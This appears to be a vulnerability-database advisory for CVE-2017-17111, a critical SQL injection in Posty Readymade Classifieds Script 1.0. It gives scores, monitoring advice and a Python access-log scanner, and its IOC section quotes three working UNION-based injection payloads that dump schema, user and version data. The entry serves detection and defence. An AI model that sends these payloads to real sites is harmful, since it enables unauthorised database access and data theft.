CVE-2017-17111
Published 2017-12-11

CVE-2017-17111: Posty Readymade Classifieds Script 1.0 allows an attacker to inject SQL commands via a listings.php?catid= or ads-details.php?ID= request.
Priority P263 · critical · 9.8 · CVSS 3.0
AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
EXPLOIT
EPSS: 8.80% (94.5th percentile)
Affected
1 range
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| scubez | posty_readymade_classifieds | — | — |
Detection & IOCs (extracted from sources)
url: `http://server/listings.php?catid=-1++/*!08888UNION*/((/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)))--+-`
url: `http://server/ads-details.php?ID=-265++/*!08888UNION*/(/*!08888SELECT*/(1),CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION()),(/*!08888Select*/+export_set(5,@:=0,(/*!08888select*/+count(*)/*!08888from*/(information_schema.columns)where@:=export_set(5,export_set(5,@,/*!08888table_name*/,0x3c6c693e,2),/*!08888column_name*/,0xa3a,2)),@,2)),(4),(5),(6),(7),(8),(9),(10),(11),(12),(13),(14),(15),(16),(17),(18),(19),(20),(21),(22),(23),(24),(25),(26))--+-`
command: `ID=-5939 UNION ALL SELECT NULL,NULL,CONCAT(0x716a626271,0x664f68565771437a5444554e794f547462774e65574f43616b767945464c416d524b646f48675a67,0x71787a7071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ZIaY`
- Monitor GET requests to listings.php with a 'catid' parameter containing SQL injection patterns, particularly MySQL-specific inline comment syntax /*!08888...*/ and UNION-based payloads.
- Monitor GET requests to ads-details.php with an 'ID' parameter containing SQL injection patterns, including UNION SELECT, SLEEP(), and boolean-based blind payloads.
- Detect use of MySQL versioned comment obfuscation token '/*!08888' in HTTP query strings, which is a distinctive fingerprint of this exploit's payloads.
- Detect time-based blind SQLi attempts via SLEEP(5) in the catid or ID GET parameters.
- The UNION-based payload for ads-details.php uses exactly 26 columns; detect anomalous UNION SELECT statements with a large number of NULL columns in the ID parameter.
- The exploit targets Posty Readymade Classifieds Script version 1.0 only; later versions may not be affected.
- The exploit was tested on Windows 7 x64 and Kali Linux x64; behavior on other platforms may differ.
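
The monitoring points above can be combined into one pass over web-server access logs. The following Python is an added example, not code from the advisory or its sources; the combined log format, the sample lines, the rule names and the 10-NULL threshold are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Endpoint file name -> injectable parameter, as named in the advisory.
TARGETS = {"listings.php": "catid", "ads-details.php": "ID"}
TOKEN = "/*!08888"  # versioned-comment marker seen in the published payloads
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
RULES = {  # rule names are hypothetical labels chosen for this example
    "union_select": re.compile(r"\bunion\b[\s(]*(?:all\b[\s(]*)?select\b", re.I),
    "sleep_call": re.compile(r"\bsleep\s*\(", re.I),
    # Assumed threshold: 10 or more consecutive NULL columns.
    "wide_null_union": re.compile(r"(?:\bnull\b\s*,\s*){10,}", re.I),
}

def scan_line(line):
    """Return the sorted names of the rules that fire for one access-log line."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    hits = set()
    if TOKEN in unquote_plus(url.query):  # token anywhere in the query string
        hits.add("versioned_comment_token")
    # Match on the file name so installs in a subdirectory are covered too.
    param = TARGETS.get(url.path.rsplit("/", 1)[-1])
    for value in parse_qs(url.query).get(param, []):
        # Drop MySQL comment delimiters so /*!08888UNION*/ reads as UNION.
        plain = re.sub(r"/\*!?\d*|\*/", " ", value)
        hits.update(name for name, rx in RULES.items() if rx.search(plain))
    return sorted(hits)

def scan_log(lines):
    """Return (line_number, rule_names) for every line that triggers a rule."""
    found = []
    for number, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            found.append((number, hits))
    return found

# Constructed sample log lines; the address is from a documentation range.
_PREFIX = '203.0.113.7 - - [11/Dec/2017:10:00:00 +0000] "GET '
_NULLS = ",".join(["NULL"] * 26)
SAMPLE_LOG = [
    _PREFIX + '/listings.php?catid=12 HTTP/1.1" 200 512',
    _PREFIX + '/listings.php?catid=-1++/*!08888UNION*/((/*!08888Select*/+1))--+- HTTP/1.1" 200 900',
    _PREFIX + '/shop/ads-details.php?ID=-5939%20UNION%20ALL%20SELECT%20' + _NULLS + '--%20x HTTP/1.1" 200 900',
    _PREFIX + '/ads-details.php?ID=265%20AND%20SLEEP(5) HTTP/1.1" 200 300',
    _PREFIX + '/search.php?q=union+select+jobs HTTP/1.1" 200 300',
]
```

The UNION, SLEEP and NULL-count rules are scoped to the two affected parameters, so the last sample line (an ordinary search on another script) is not flagged; only the `/*!08888` token rule applies to every query string.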
CVSS provenance
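| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v3.0 | 9.8 | CRITICAL | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| nvd | v2.0 | 7.5 | HIGH | AV:N/AC:L/Au:N/C:P/I:P/A:P |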
No detection rules found.
No writeups or analysis indexed.
Published: 2017-12-11